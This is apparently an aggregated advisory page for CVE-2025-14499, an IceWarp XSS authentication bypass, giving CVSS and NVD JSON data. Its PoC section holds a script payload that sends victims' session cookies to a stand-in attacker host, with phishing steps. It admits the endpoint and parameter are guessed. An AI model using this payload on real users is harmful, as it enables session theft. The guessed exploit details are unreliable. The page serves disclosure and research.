Security Vulnerability Report
CVE-2025-14499 CVSS 8.8 HIGH

CVE-2025-14499

Published: 2025-12-23 22:15:51
Last Modified: 2026-04-15 00:35:42

Description

IceWarp gmaps Cross-Site Scripting Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of IceWarp. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of a parameter passed to the gmaps webpage. The issue results from the lack of proper validation of user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-25441.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

IceWarp Email Server build < 8.14.2.0.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
// CVE-2025-14499 PoC - IceWarp gmaps XSS Authentication Bypass
// This PoC demonstrates the XSS vulnerability in the IceWarp gmaps component.
// NOTE: the endpoint path (/webmail/gmaps) and parameter name (param) used below
// are illustrative; the advisory text does not name the vulnerable parameter.
const targetUrl = 'https://target-icewarp-server';

// Malicious XSS payload to steal session cookies
const xssPayload = '<script>\n' +
  'fetch("https://attacker-server/steal?cookie=" + document.cookie + "&url=" + location.href)\n' +
  '</script>';

// Encode the payload for URL injection
const encodedPayload = encodeURIComponent(xssPayload);

// Construct the malicious URL targeting the gmaps endpoint
const maliciousUrl = `${targetUrl}/webmail/gmaps?param=${encodedPayload}`;

// Display the exploit URL
console.log('Malicious URL:', maliciousUrl);

// Simulate the attack scenario
function simulateAttack() {
  console.log('\n[+] Attack Simulation:');
  console.log('1. Attacker crafts malicious URL with XSS payload');
  console.log('2. Attacker sends URL to victim via phishing email');
  console.log('3. Victim clicks the link while logged into IceWarp');
  console.log('4. XSS payload executes in victim\'s browser');
  console.log('5. Session cookies are stolen and sent to attacker');
  console.log('6. Attacker hijacks the session and bypasses authentication');
}

simulateAttack();

References

https://support.icewarp.com/hc/en-us/community/posts/40040542307729-EPOS-Update-2-build-8-14-2-0-8
https://www.zerodayinitiative.com/advisories/ZDI-25-1071/

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-14499",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-23T22:15:51.267",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "IceWarp gmaps Cross-Site Scripting Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of IceWarp. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the handling of a parameter passed to the gmaps webpage. The issue results from the lack of proper validation of user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-25441."
      }
    ],
    "metrics": {
      "cvssMetricV30": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.0",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-79" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://support.icewarp.com/hc/en-us/community/posts/40040542307729-EPOS-Update-2-build-8-14-2-0-8",
        "source": "[email protected]"
      },
      {
        "url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1071/",
        "source": "[email protected]"
      }
    ]
  }
}